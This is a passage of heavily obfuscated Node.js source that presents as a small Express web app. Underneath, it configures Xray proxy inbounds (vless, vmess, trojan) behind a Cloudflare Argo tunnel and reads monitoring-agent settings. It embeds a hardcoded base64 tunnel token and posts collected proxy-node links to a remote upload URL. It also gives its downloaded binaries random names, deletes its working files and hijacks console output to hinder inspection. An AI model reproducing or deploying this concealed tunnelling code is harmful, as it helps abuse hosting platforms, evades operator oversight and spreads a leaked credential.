_0x5f2d70(_0x247cdc-0x1e2,_0x847ac3-0xb1,_0x2a0a46-0x1d,_0x533042);}if(_0x1ee8e5){if(_0x5d5862[_0x5b87a8(0x9d,-0x98,0x125,-0xd)]===_0x5d5862[_0x522b96(0x5aa,0x76d,0x604,0x6f7)])return null;else{const _0x64a456=_0x1ee8e5[_0x522b96(0x625,0x5f4,0x4ac,0x505)](_0x356776,arguments);return _0x1ee8e5=null,_0x64a456;}}}:function(){};return _0x351894=![],_0x1a2487;}else{const _0x41a52f=_0x184223[_0x5f2d70(0x3d0,0x4d2,0x31c,0x4d7)](_0x3308cd)[_0xdb7f00(-0x2e2,-0x1f7,-0x23d,-0x2e5)]('base64');_0x5494c8[_0x5f2d70(0x44f,0x3fb,0x32b,0x4c4)](_0xdb7f00(-0xea,-0x152,-0x6e,-0x184)+'pe',_0x2daa60[_0xdb7f00(-0xb,0x2b,0x5b,0x15d)]),_0x2014c2[_0x5f2d70(0x5a3,0x4bb,0x5ee,0x463)](_0x41a52f);}};}()),_0x976d75=_0x3bf3cb(this,function(){const _0x2820b8={'VLUnl':_0x4287db(-0x144,0x11c,-0x1d,0xd),'QuFbC':_0x447c91(-0xc,-0x17,-0x9b,0x98),'TXTWR':function(_0xfc4b7a,_0x670cdc){return _0xfc4b7a(_0x670cdc);},'GSSnA':function(_0x477009,_0x22821e){return _0x477009+_0x22821e;},'KPYJY':_0x447c91(0x8e,-0x1e,0x40,-0xf6)+_0x4287db(0xb7,0x144,0x18,0xca),'hlODm':_0x447c91(-0x12d,-0x5a,-0xc2,0x2b)+_0x447c91(0x133,0x19,-0xb0,-0xc0)+'rn\x20this\x22)('+'\x20)','uBnhF':function(_0x147f41){return _0x147f41();},'VqcxT':_0x4287db(0x49,-0x9b,-0xa8,0x9d),'zHpXP':_0x4287db(-0x189,-0x1d3,-0x124,-0x172),'UnbCy':_0x447c91(-0xe7,0x12,0x1f,0x83),'QNUnm':_0x447c91(0xfb,0x110,0x1d0,0x152),'GnwrU':function(_0x5ceaa7,_0x12d331){return _0x5ceaa7<_0x12d331;}};let _0x33ddd0;try{if(_0x2820b8[_0x4287db(0xd7,0x9,0x145,0x65)]===_0x2820b8[_0x447c91(0xd0,0xf,-0x103,-0xda)])_0x3aa14c=_0x4287db(-0x112,0x7,0x2f,-0x58)+'dge-ip-ver'+_0x4287db(-0x19c,-0x152,0x18,-0x112)+'--no-autou'+'pdate\x20--pr'+_0x447c91(0x17f,0x51,-0x64,-0x5e)+_0x447c91(0x1b5,0x101,0xf6,0x1ef)+_0x447c91(-0x1,0xf3,0x3f,-0x44)+_0x558b56;else{const _0x10f262=_0x2820b8[_0x447c91(-0x4e,-0x14,0x2d,0x12f)](Function,_0x2820b8[_0x4287db(-0x96,0x6f,-0x5,0x7c)](_0x2820b8[_0x4287db(-0xcd,0xdf,0x86,0x7c)](_0x2820b8[_0x4287db(0xe3,0xa8,0xe1,0x4f)],_0x2820b8[_0x4287db(-0x54,-0x1b7,-0x43,-0x121)]),');'));_0x33ddd0=_0x2820b8[_0x4287db(0x85,0x89,0xa9,0x6f)](_0x10f262);}}catch(_0x1241fd){_0x33ddd0=window;}const _0x26ed13=_0x33ddd0[_0x447c91(-0xb0,-0x23,-0x98,-0xc1)]=_0x33ddd0['console']||{},_0x293846=[_0x2820b8['VqcxT'],_0x4287db(0xb8,0x1c0,0x23c,0xec),_0x4287db(-0x11,-0x63,-0x1d9,-0x14b),_0x2820b8[_0x447c91(0x107,0x97,-0x5d,0x11c)],_0x2820b8[_0x4287db(-0xa,-0x4d,-0x105,-0x8b)],_0x2820b8[_0x4287db(0x36,0x87,-0x2f,-0x48)],'trace'];function _0x447c91(_0x52b630,_0x2d2835,_0x3dc680,_0x1ee2a5){return _0x43ed(_0x2d2835- -0x29e,_0x52b630);}function _0x4287db(_0x48b0f0,_0x3eb636,_0x18ed1b,_0x397fc0){return _0x43ed(_0x397fc0- -0x2dd,_0x18ed1b);}for(let _0x2e8ae3=0x1947+-0x8*-0x170+-0x24c7;_0x2820b8[_0x447c91(-0xf7,-0x64,0x7,-0xeb)](_0x2e8ae3,_0x293846[_0x4287db(-0x9e,0x165,-0xc9,0x69)]);_0x2e8ae3++){const _0x42ea1c=_0x3bf3cb['constructo'+'r']['prototype']['bind'](_0x3bf3cb),_0x546bc7=_0x293846[_0x2e8ae3],_0x1e23e6=_0x26ed13[_0x546bc7]||_0x42ea1c;_0x42ea1c[_0x447c91(0x183,0xf6,0x195,0x238)]=_0x3bf3cb[_0x4287db(0x189,0x14a,-0x88,0xba)](_0x3bf3cb),_0x42ea1c[_0x447c91(-0x1,-0xcc,0x51,-0x1fb)]=_0x1e23e6[_0x4287db(-0xf3,-0x6b,-0x153,-0x10b)][_0x4287db(-0x50,0x1d1,0x205,0xba)](_0x1e23e6),_0x26ed13[_0x546bc7]=_0x42ea1c;}});_0x976d75();const express=require('express'),app=express(),axios=require(_0x50d979(0x26a,0x292,0x1a9,0x59)),os=require('os'),fs=require('fs'),path=require(_0x51c265(0x4d2,0x502,0x441,0x402)),{promisify}=require(_0x50d979(0x463,0x352,0x376,0x305)),exec=promisify(require(_0x50d979(0x1e1,0x349,0x23c,0x159)+'ess')[_0x51c265(0x4c2,0x3aa,0x5d6,0x4cd)]),{execSync}=require(_0x50d979(0x25e,0x13f,0x23c,0xf2)+_0x50d979(0x2fe,0x49b,0x37f,0x330)),UPLOAD_URL=process[_0x50d979(0x352,0x428,0x338,0x3c6)][_0x51c265(0x4e5,0x49a,0x440,0x3f9)]||'',PROJECT_URL=process['env'][_0x51c265(0x48f,0x50a,0x33d,0x57d)+'L']||'',AUTO_ACCESS=process[_0x50d979(0x3bb,0x41e,0x338,0x1f7)]['AUTO_ACCES'+'S']||![],FILE_PATH=process[_0x51c265(0x579,0x471,0x64e,0x51f)]['FILE_PATH']||_0x51c265(0x533,0x47c,0x537,0x4d4),SUB_PATH=process[_0x51c265(0x579,0x5db,0x63e,0x5f0)][_0x50d979(0x275,0x242,0x389,0x49e)]||'ckxiao',PORT=process[_0x51c265(0x579,0x6b0,0x577,0x6bd)]['SERVER_POR'+'T']||process[_0x50d979(0x2a7,0x356,0x338,0x471)][_0x50d979(0x250,0x3c7,0x300,0x2d2)]||-0xda5+0x2432+-0x3b*0x2f,UUID=process[_0x50d979(0x466,0x44c,0x338,0x2d3)][_0x50d979(0x15d,0x20d,0x140,0x1f5)]||_0x50d979(0x355,0x28c,0x37e,0x2cc)+_0x51c265(0x3b3,0x356,0x3d8,0x3fe)+_0x50d979(0x12a,0xce,0x19c,0xb4)+_0x51c265(0x421,0x44b,0x3ab,0x545),NEZHA_SERVER=process[_0x51c265(0x579,0x649,0x5b6,0x4e4)][_0x51c265(0x41e,0x568,0x4ad,0x3cc)+'ER']||'',NEZHA_PORT=process['env'][_0x50d979(0x22d,0xce,0xf7,0x58)]||'',NEZHA_KEY=process[_0x50d979(0x272,0x380,0x338,0x233)][_0x50d979(0x56,0x9f,0x188,0x1fb)]||'',ARGO_DOMAIN=process[_0x51c265(0x579,0x54e,0x692,0x452)][_0x51c265(0x42e,0x575,0x431,0x2ed)+'N']||'ckxiao.lee'+_0x51c265(0x53e,0x43f,0x4df,0x609)+'.dpdns.org',ARGO_AUTH=process[_0x51c265(0x579,0x501,0x5aa,0x454)][_0x50d979(0x224,0x442,0x316,0x3f9)]||_0x51c265(0x4b8,0x5e3,0x5a3,0x555)+_0x51c265(0x359,0x2dc,0x3cb,0x3e8)+_0x50d979(0x21b,0x5c,0x18c,0xa7)+_0x50d979(0x2ed,0x3b6,0x28a,0x225)+'MWYyZDNhND'+_0x51c265(0x570,0x4f9,0x524,0x641)+_0x51c265(0x52a,0x4cc,0x435,0x5d5)+'AtYzNlOC00'+_0x51c265(0x351,0x2fa,0x22c,0x46d)+_0x51c265(0x33c,0x29c,0x29b,0x2e6)+_0x50d979(0xea,0x88,0x173,0x1b4)+_0x51c265(0x39e,0x293,0x2a4,0x422)+'VmtPV0prT1'+'RVdE1tTTNN'+_0x50d979(0x293,0x231,0x2b1,0x1d2)+_0x50d979(0x69,0x295,0x19b,0x25f)+'TkRkbE5qUX'+_0x51c265(0x3d4,0x352,0x354,0x3ea)+_0x50d979(0x293,0x242,0x2a7,0x391),ARGO_PORT=process[_0x50d979(0x266,0x2e4,0x338,0x29a)][_0x51c265(0x423,0x3e5,0x339,0x4f7)]||0x90b*0x1+-0x148e+-0x284*-0x11;function _0x51c265(_0x3e4dd4,_0x5f0f4c,_0x58192c,_0x6ccc86){return _0x43ed(_0x3e4dd4-0x1d5,_0x58192c);}const CFIP=process[_0x50d979(0x333,0x34d,0x338,0x36e)][_0x51c265(0x3a5,0x300,0x2e1,0x4ca)]||_0x51c265(0x4ae,0x5f6,0x3be,0x38b)+_0x50d979(0x21f,0x242,0x293,0x2ec),CFPORT=process[_0x51c265(0x579,0x4c1,0x6ac,0x555)][_0x50d979(0xa2,0x2ce,0x18e,0xcf)]||0x5db+0x176d+-0x1b8d,NAME=process[_0x50d979(0x338,0x2fe,0x338,0x2c3)][_0x50d979(0x24f,0x2e8,0x35c,0x211)]||'ckxiao';!fs[_0x51c265(0x34c,0x40e,0x292,0x325)](FILE_PATH)?(fs['mkdirSync'](FILE_PATH),console[_0x51c265(0x54f,0x40c,0x611,0x685)](FILE_PATH+(_0x50d979(0x35a,0x26f,0x210,0x130)+'d'))):console['log'](FILE_PATH+(_0x51c265(0x393,0x274,0x3e3,0x4df)+'xists'));function generateRandomName(){const _0x5ae205={};_0x5ae205[_0x46d4ca(-0x20b,-0xa5,0x5f,-0xf3)]=_0x46d4ca(0x90,0x124,0x56,0x97)+_0x46d4ca(-0x7f,0x48,-0x62,-0x40)+'uvwxyz',_0x5ae205['AaZkM']=function(_0x4ba4cd,_0x1a0810){return _0x4ba4cd*_0x1a0810;};const _0x20de91=_0x5ae205,_0x4b72fe=_0x20de91[_0x22f0d3(0x3a9,0x3ef,0x433,0x3a9)];function _0x22f0d3(_0x4ffb03,_0x1ebe4f,_0xb1167,_0x3cfca7){return _0x50d979(_0x4ffb03-0x133,_0x1ebe4f-0x11e,_0x3cfca7-0x212,_0x1ebe4f);}let _0x9b1ac1='';for(let _0x2eefab=-0x5ba+0x6*-0x12e+0xcce;_0x2eefab<0x1bb6+-0x13f9+-0x7b7;_0x2eefab++){_0x9b1ac1+=_0x4b72fe['charAt'](Math['floor'](_0x20de91[_0x22f0d3(0x388,0x471,0x3c5,0x4c9)](Math['random'](),_0x4b72fe['length'])));}function _0x46d4ca(_0x5b1ded,_0x1fc272,_0x530fc0,_0x230029){return _0x51c265(_0x230029- -0x4cb,_0x1fc272-0x102,_0x530fc0,_0x230029-0x99);}return _0x9b1ac1;}const npmName=generateRandomName(),webName=generateRandomName(),botName=generateRandomName(),phpName=generateRandomName();let npmPath=path['join'](FILE_PATH,npmName),phpPath=path['join'](FILE_PATH,phpName),webPath=path['join'](FILE_PATH,webName),botPath=path['join'](FILE_PATH,botName),subPath=path[_0x50d979(0x3cb,0x3c2,0x2a1,0x3a3)](FILE_PATH,_0x50d979(0x414,0x31a,0x33e,0x2fd)),listPath=path[_0x50d979(0x1c1,0x3ef,0x2a1,0x21e)](FILE_PATH,_0x51c265(0x374,0x3f2,0x3a4,0x4af)),bootLogPath=path[_0x50d979(0x23e,0x300,0x2a1,0x263)](FILE_PATH,_0x50d979(0xcb,0x2bc,0x1c0,0x2ae)),configPath=path[_0x51c265(0x4e2,0x5b8,0x549,0x42f)](FILE_PATH,_0x50d979(0x234,0x17b,0x26e,0x313)+'n');function deleteNodes(){function _0x2335fd(_0x24ee38,_0x5c75eb,_0x131977,_0xaa2602){return _0x50d979(_0x24ee38-0xef,_0x5c75eb-0x6d,_0xaa2602-0x35b,_0x24ee38);}function _0x5b9514(_0x5be8d4,_0x4ce0a5,_0xa7881f,_0x3177dc){return _0x51c265(_0x4ce0a5-0x82,_0x4ce0a5-0xe0,_0xa7881f,_0x3177dc-0xe4);}const _0x240918={'qlrHU':_0x5b9514(0x60a,0x644,0x6ef,0x6ff)+'ning','ZvAmD':_0x2335fd(0x46a,0x54b,0x4e6,0x497)+'for\x20using\x20'+_0x5b9514(0x40a,0x4b2,0x419,0x56f)+_0x2335fd(0x390,0x47c,0x3c4,0x4a1),'wWUip':function(_0x4219ea,_0x32219e,_0x312158){return _0x4219ea(_0x32219e,_0x312158);},'NvXdN':function(_0x2f8d77,_0x5864da){return _0x2f8d77(_0x5864da);},'DkJnJ':function(_0x3b3db4,_0xf818b2){return _0x3b3db4!==_0xf818b2;},'uSFnv':'NUKkn','iLwFf':'xRftJ','EjXEH':_0x5b9514(0x620,0x50b,0x62b,0x5d7),'nBWpX':_0x2335fd(0x65e,0x5d8,0x641,0x5b7),'rtJyE':_0x2335fd(0x3b9,0x486,0x4c7,0x449)};try{if(_0x240918['DkJnJ'](_0x240918['uSFnv'],_0x240918[_0x2335fd(0x61e,0x59e,0x59f,0x68d)])){if(!UPLOAD_URL)return;if(!fs[_0x2335fd(0x3fc,0x3d4,0x5a4,0x466)](subPath))return;let _0x289c29;try{_0x289c29=fs[_0x2335fd(0x5fa,0x428,0x61e,0x550)+'nc'](subPath,'utf-8');}catch{return null;}const _0x10c419=Buffer['from'](_0x289c29,_0x240918[_0x5b9514(0x63b,0x4fe,0x3ae,0x4df)])['toString'](_0x240918[_0x5b9514(0x4aa,0x4c4,0x47a,0x42d)]),_0x3aa952=_0x10c419[_0x5b9514(0x53a,0x619,0x536,0x57d)]('\x0a')[_0x5b9514(0x53d,0x538,0x608,0x59d)](_0x15b009=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x2335fd(0x639,0x5e7,0x566,0x4ea)](_0x15b009));if(_0x3aa952[_0x2335fd(0x693,0x5f7,0x6e0,0x635)]===0x1c17+0x2379+-0x3f90)return;const _0x13d146={};_0x13d146[_0x2335fd(0x589,0x6ec,0x7c0,0x67e)]=_0x3aa952;const _0x1d542b={};_0x1d542b[_0x5b9514(0x3fa,0x4ce,0x548,0x3c6)+'pe']='applicatio'+'n/json';const _0x3dc920={};return _0x3dc920[_0x5b9514(0x299,0x3de,0x3a6,0x4e3)]=_0x1d542b,axios[_0x5b9514(0x39c,0x400,0x532,0x462)](UPLOAD_URL+(_0x2335fd(0x5d1,0x75c,0x5f6,0x655)+_0x5b9514(0x340,0x48f,0x4c9,0x5a1)),JSON[_0x5b9514(0x45d,0x40b,0x35d,0x371)](_0x13d146),_0x3dc920)[_0x5b9514(0x447,0x4f7,0x5da,0x544)](_0x27d215=>{return null;}),null;}else _0x240918[_0x5b9514(0x480,0x410,0x2d1,0x4c3)](_0x37bb69,_0x2335fd(0x571,0x532,0x6a3,0x649)+_0x178324[_0x5b9514(0x5ed,0x564,0x657,0x461)]('\x20')+(_0x2335fd(0x6e3,0x7df,0x636,0x6c4)+'l\x202>&1'),_0x4e85c3=>{function _0x46de0e(_0x3bcf4f,_0x5d4225,_0x440649,_0x282689){return _0x2335fd(_0x440649,_0x5d4225-0xa0,_0x440649-0x15d,_0x5d4225- -0x2c1);}function _0x3b3a24(_0x37b9d4,_0x30c685,_0x1ff09b,_0x13f70f){return _0x5b9514(_0x37b9d4-0x148,_0x13f70f- -0x421,_0x1ff09b,_0x13f70f-0x40);}_0x1838d5[_0x46de0e(0xd6,0x211,0x25f,0x20c)](),_0x35398e['log'](_0x240918['qlrHU']),_0x4910a0[_0x3b3a24(0x244,0x2f6,0x2e3,0x1b0)](_0x240918[_0x46de0e(0x2ec,0x342,0x29f,0x252)]);});}catch(_0x14cccf){if(_0x240918[_0x2335fd(0x4a5,0x478,0x4d9,0x5a1)]===_0x240918[_0x5b9514(0x57a,0x509,0x455,0x4b7)])return null;else{const _0x1b7a92='Download\x20'+_0x13749b[_0x2335fd(0x617,0x824,0x721,0x6d2)](_0x183d73)+'\x20failed:\x20'+_0x29a0b0[_0x2335fd(0x5d2,0x717,0x77e,0x6aa)];_0xe1b724[_0x5b9514(0x2e0,0x3c2,0x410,0x484)](_0x1b7a92),_0x240918[_0x2335fd(0x6b3,0x521,0x4a1,0x585)](_0x6b9dee,_0x1b7a92);}}}function cleanupOldFiles(){function _0x166150(_0x50b5a4,_0x4389f9,_0x1687d4,_0x59b8f6){return _0x51c265(_0x59b8f6- -0x226,_0x4389f9-0x157,_0x1687d4,_0x59b8f6-0xe3);}function _0x21d28b(_0x1540ac,_0x5dee62,_0x37b93f,_0x66ff16){return _0x50d979(_0x1540ac-0xb,_0x5dee62-0x92,_0x66ff16-0xc7,_0x5dee62);}try{const _0x368ddf=fs[_0x166150(0x202,0xb2,0x1ea,0x135)+'c'](FILE_PATH);_0x368ddf[_0x166150(0x2f4,0x3ba,0x360,0x37f)](_0x4cfa53=>{function _0x48b38d(_0x23017b,_0x24bcd2,_0x52dec1,_0xdaf5e0){return _0x21d28b(_0x23017b-0x118,_0x52dec1,_0x52dec1-0x197,_0xdaf5e0-0x354);}function _0x58fcba(_0x3bb48c,_0x48a022,_0x4f95f3,_0x44d54f){return _0x166150(_0x3bb48c-0x178,_0x48a022-0x7d,_0x3bb48c,_0x4f95f3- -0x318);}const _0x19bc92=path[_0x58fcba(-0xf1,0xd,-0x5c,-0x1ac)](FILE_PATH,_0x4cfa53);try{const _0x51fbf7=fs[_0x58fcba(-0x13c,0x4b,-0xf5,-0x1ef)](_0x19bc92);_0x51fbf7[_0x58fcba(0x8,-0x1f7,-0xfb,-0x199)]()&&fs[_0x48b38d(0x849,0x5f9,0x5d9,0x705)](_0x19bc92);}catch(_0x45a61f){}});}catch(_0x377ee4){}}app['get']('/',function(_0x39d9f3,_0x262a8b){const _0x4e45c4={};_0x4e45c4[_0x163fb1(-0x7,0x27,0x52,-0x10f)]=_0x163fb1(-0xbb,0x4c,0xd7,0x81)+'d!';const _0x4e3730=_0x4e45c4;function _0x2e141f(_0x4a264b,_0x2e5421,_0x4d132e,_0xd8850c){return _0x51c265(_0x4d132e- -0xb1,_0x2e5421-0x1dd,_0x2e5421,_0xd8850c-0xf2);}function _0x163fb1(_0x491604,_0x1e4661,_0x405686,_0x106cad){return _0x50d979(_0x491604-0x15d,_0x1e4661-0x3a,_0x1e4661- -0x29c,_0x405686);}_0x262a8b[_0x2e141f(0x584,0x647,0x505,0x5ce)](_0x4e3730[_0x163fb1(-0x7a,0x27,-0x47,0xdf)]);});async function generateConfig(){const _0xef8463={};_0xef8463[_0x3c0d74(-0x12f,-0x4e,-0x12b,-0x3c)]=_0x3c0d74(0x80,0x26,-0xaf,-0xca),_0xef8463[_0x3c0d74(-0x23f,-0xb3,-0x142,-0x267)]=_0x1ba3c1(0x3ef,0x513,0x43e,0x5fb);function _0x3c0d74(_0x11fd8f,_0x980fef,_0x22e97d,_0x1729a4){return _0x51c265(_0x22e97d- -0x52d,_0x980fef-0x13f,_0x1729a4,_0x1729a4-0xfa);}_0xef8463[_0x1ba3c1(0x59b,0x5a5,0x55e,0x505)]=_0x3c0d74(0x9a,-0x148,-0x4c,-0x8b)+_0x3c0d74(-0xa9,0x37,-0x3c,-0x184),_0xef8463[_0x3c0d74(-0xde,-0x1a6,-0x1ef,-0x18a)]=_0x3c0d74(0x8c,0x23,-0x2a,-0x73)+'o',_0xef8463[_0x3c0d74(-0x6d,-0x70,-0x1a2,-0x1c8)]=_0x3c0d74(-0x24c,-0x5c,-0x116,-0x122)+'o',_0xef8463[_0x3c0d74(-0x176,-0x182,-0x1a7,-0x85)]=_0x3c0d74(-0xc3,0xba,-0x32,-0x30)+'go',_0xef8463[_0x3c0d74(-0xd8,0x3f,-0xae,0x47)]=_0x1ba3c1(0x48c,0x576,0x50c,0x563),_0xef8463[_0x1ba3c1(0x4f6,0x530,0x5ac,0x545)]=_0x1ba3c1(0x573,0x51a,0x49a,0x651),_0xef8463[_0x3c0d74(-0x185,-0x2e6,-0x1c3,-0x2fb)]=_0x3c0d74(-0x176,-0x138,-0xd5,-0x72),_0xef8463['PCdwE']=_0x3c0d74(-0x111,0x5a,-0xd0,-0x158),_0xef8463[_0x1ba3c1(0x62e,0x504,0x3c7,0x437)]=_0x3c0d74(0xa8,-0xb5,0x74,0x186),_0xef8463[_0x1ba3c1(0x520,0x66a,0x7ad,0x554)]=_0x1ba3c1(0x4c8,0x615,0x63c,0x723),_0xef8463[_0x1ba3c1(0x599,0x568,0x565,0x5d2)]=_0x1ba3c1(0x5b7,0x55b,0x653,0x47a),_0xef8463[_0x1ba3c1(0x621,0x56d,0x60b,0x5d0)]=_0x1ba3c1(0x7be,0x711,0x857,0x7b2),_0xef8463['atmfU']=_0x3c0d74(-0xce,0x131,0x3d,-0x7b),_0xef8463[_0x3c0d74(-0x42,-0x37,-0x55,-0x80)]=_0x3c0d74(0x2e,-0x108,0x2f,0x88),_0xef8463[_0x1ba3c1(0x408,0x52a,0x56a,0x3fc)]=_0x1ba3c1(0x6e6,0x6e2,0x793,0x59c),_0xef8463['VgbLJ']=_0x3c0d74(-0x7f,0xe4,0x9e,0x1b9),_0xef8463['AdtCd']=_0x3c0d74(-0xf9,0x4f,-0x7e,0xbf)+'n';const _0x5475d0=_0xef8463,_0xa54619={};_0xa54619[_0x3c0d74(0x35,-0x6e,-0xd7,-0x1e4)]=_0x5475d0[_0x3c0d74(-0x11,-0xca,-0x12b,-0x1b1)],_0xa54619[_0x1ba3c1(0x602,0x4ee,0x566,0x410)]=_0x5475d0[_0x1ba3c1(0x533,0x5b0,0x678,0x4c6)],_0xa54619[_0x3c0d74(-0x21,0x95,-0x60,-0xf5)]=_0x5475d0[_0x3c0d74(-0x4a,-0x21c,-0x142,-0x290)];const _0x2b9adb={};_0x2b9adb['id']=UUID,_0x2b9adb[_0x1ba3c1(0x7a8,0x6e4,0x5d6,0x70c)]=_0x5475d0['GSTpP'];const _0x26fd9e={};_0x26fd9e[_0x1ba3c1(0x6d1,0x720,0x736,0x696)]=0xbb9;const _0x2f1fec={};_0x2f1fec['clients']=[_0x2b9adb],_0x2f1fec[_0x3c0d74(-0x26a,-0xa6,-0x191,-0x1c4)]=_0x5475d0['OxpeE'],_0x2f1fec[_0x3c0d74(-0xb,0x9d,0x26,-0x6a)]=[_0x26fd9e,{'path':_0x5475d0[_0x1ba3c1(0x438,0x4ec,0x51f,0x4bf)],'dest':0xbba},{'path':_0x5475d0['PqNti'],'dest':0xbbb},{'path':_0x5475d0['MUBNZ'],'dest':0xbbc}];const _0x44bde9={};_0x44bde9[_0x3c0d74(0xc0,0xb1,0x79,0x8c)]='tcp';const _0x2a301f={};_0x2a301f[_0x3c0d74(-0x17f,-0x13,-0x3e,0x6)]=ARGO_PORT,_0x2a301f[_0x3c0d74(0x8d,0x81,-0x2f,-0x48)]=_0x1ba3c1(0x5f4,0x51a,0x636,0x3ee),_0x2a301f['settings']=_0x2f1fec,_0x2a301f['streamSett'+_0x1ba3c1(0x62f,0x640,0x718,0x604)]=_0x44bde9;const _0x10b885={};_0x10b885['id']=UUID;const _0x51c26c={};_0x51c26c[_0x3c0d74(-0x71,-0xb0,-0x3e,-0x15f)]=0xbb9,_0x51c26c['listen']=_0x5475d0[_0x3c0d74(-0x72,0x4b,-0xae,0x6f)],_0x51c26c['protocol']=_0x5475d0['XREqQ'],_0x51c26c[_0x1ba3c1(0x50f,0x4eb,0x60d,0x46f)]={},_0x51c26c[_0x1ba3c1(0x84c,0x77b,0x789,0x813)+_0x3c0d74(-0x1b9,0x8c,-0x9b,-0x1ea)]={},_0x51c26c[_0x1ba3c1(0x50f,0x4eb,0x60d,0x46f)][_0x3c0d74(0xea,-0x5f,0x64,-0xc6)]=[_0x10b885],_0x51c26c[_0x1ba3c1(0x50f,0x4eb,0x60d,0x46f)][_0x1ba3c1(0x4b3,0x54a,0x454,0x498)]=_0x5475d0['OxpeE'],_0x51c26c[_0x1ba3c1(0x84c,0x77b,0x789,0x813)+_0x3c0d74(-0x1b9,0x8c,-0x9b,-0x1ea)]['network']=_0x5475d0[_0x3c0d74(-0x274,-0x108,-0x1c3,-0x199)],_0x51c26c[_0x1ba3c1(0x84c,0x77b,0x789,0x813)+_0x3c0d74(-0x1b9,0x8c,-0x9b,-0x1ea)][_0x1ba3c1(0x4aa,0x5d3,0x535,0x5bb)]='none';const _0x20caf0={};_0x20caf0['id']=UUID,_0x20caf0['level']=0x0;const _0x3088ee={};_0x3088ee[_0x1ba3c1(0x79d,0x680,0x5d7,0x759)]='/vless-arg'+'o';const _0x593209={};_0x593209['port']=0xbba,_0x593209[_0x3c0d74(-0x1be,-0x138,-0xfe,-0xd)]=_0x5475d0[_0x3c0d74(-0x159,0x11,-0xae,0x3a)],_0x593209[_0x1ba3c1(0x575,0x6ac,0x704,0x599)]=_0x5475d0[_0x1ba3c1(0x542,0x530,0x679,0x4ee)],_0x593209[_0x1ba3c1(0x606,0x4eb,0x506,0x3da)]={},_0x593209[_0x1ba3c1(0x7fb,0x77b,0x79c,0x868)+_0x1ba3c1(0x621,0x640,0x555,0x548)]={},_0x593209[_0x1ba3c1(0x3ae,0x4f2,0x4e5,0x5b5)]={},_0x593209[_0x1ba3c1(0x606,0x4eb,0x506,0x3da)]['clients']=[_0x20caf0],_0x593209[_0x1ba3c1(0x606,0x4eb,0x506,0x3da)][_0x1ba3c1(0x63d,0x54a,0x4bd,0x68f)]=_0x5475d0['OxpeE'],_0x593209[_0x1ba3c1(0x7fb,0x77b,0x79c,0x868)+_0x1ba3c1(0x621,0x640,0x555,0x548)]['network']='ws',_0x593209[_0x1ba3c1(0x7fb,0x77b,0x79c,0x868)+_0x1ba3c1(0x621,0x640,0x555,0x548)][_0x3c0d74(-0x32,-0x1a5,-0x108,-0x198)]=_0x5475d0['OxpeE'],_0x593209[_0x1ba3c1(0x7fb,0x77b,0x79c,0x868)+_0x1ba3c1(0x621,0x640,0x555,0x548)]['wsSettings']=_0x3088ee,_0x593209[_0x1ba3c1(0x3ae,0x4f2,0x4e5,0x5b5)][_0x1ba3c1(0x6ff,0x68d,0x69d,0x5a3)]=!![],_0x593209[_0x1ba3c1(0x3ae,0x4f2,0x4e5,0x5b5)][_0x3c0d74(0x2b,0xf2,0x58,-0xcf)+'de']=[_0x5475d0[_0x3c0d74(-0x9d,-0x80,-0xf1,0x5e)],_0x5475d0[_0x1ba3c1(0x52c,0x504,0x4ac,0x3fe)],_0x5475d0[_0x3c0d74(-0x15,-0x6a,-0x71,-0x114)]],_0x593209[_0x1ba3c1(0x3ae,0x4f2,0x4e5,0x5b5)][_0x1ba3c1(0x56f,0x5e1,0x64c,0x58d)+'ly']=![];const _0xaacc6d={};_0xaacc6d['id']=UUID,_0xaacc6d['alterId']=0x0;const _0x296052={};_0x296052['clients']=[_0xaacc6d];const _0x3d4ea1={};_0x3d4ea1[_0x3c0d74(0xee,0xff,-0x3e,-0x72)]=0xbbb,_0x3d4ea1[_0x1ba3c1(0x57d,0x5dd,0x65b,0x49f)]=_0x5475d0['SYBnT'],_0x3d4ea1[_0x1ba3c1(0x7d8,0x6ac,0x67a,0x738)]=_0x5475d0['lGMyt'],_0x3d4ea1[_0x3c0d74(-0x216,-0x1a8,-0x1f0,-0x2cd)]=_0x296052,_0x3d4ea1[_0x3c0d74(0x6a,-0x42,0xa0,0xcd)+_0x1ba3c1(0x561,0x640,0x67f,0x611)]={},_0x3d4ea1[_0x3c0d74(-0xe5,-0x2ec,-0x1e9,-0xbb)]={},_0x3d4ea1[_0x3c0d74(0x6a,-0x42,0xa0,0xcd)+_0x1ba3c1(0x561,0x640,0x67f,0x611)]['network']='ws',_0x3d4ea1[_0x3c0d74(0x6a,-0x42,0xa0,0xcd)+_0x1ba3c1(0x561,0x640,0x67f,0x611)][_0x1ba3c1(0x72a,0x68b,0x72e,0x5fd)]={},_0x3d4ea1[_0x3c0d74(0x6a,-0x42,0xa0,0xcd)+_0x1ba3c1(0x561,0x640,0x67f,0x611)][_0x1ba3c1(0x72a,0x68b,0x72e,0x5fd)][_0x1ba3c1(0x5a7,0x680,0x690,0x777)]=_0x5475d0[_0x1ba3c1(0x542,0x539,0x544,0x472)],_0x3d4ea1[_0x3c0d74(-0xe5,-0x2ec,-0x1e9,-0xbb)]['enabled']=!![],_0x3d4ea1[_0x3c0d74(-0xe5,-0x2ec,-0x1e9,-0xbb)][_0x1ba3c1(0x691,0x733,0x7f4,0x681)+'de']=[_0x5475d0[_0x1ba3c1(0x547,0x5ea,0x610,0x4f4)],_0x5475d0['gqaDu'],_0x5475d0[_0x1ba3c1(0x5a7,0x66a,0x5c3,0x747)]],_0x3d4ea1[_0x3c0d74(-0xe5,-0x2ec,-0x1e9,-0xbb)]['metadataOn'+'ly']=![];const _0x241835={};_0x241835[_0x1ba3c1(0x4af,0x51f,0x65b,0x40f)]=UUID;const _0x3d6fa4={};_0x3d6fa4[_0x3c0d74(0x53,0x4d,0x64,0xab)]=[_0x241835];const 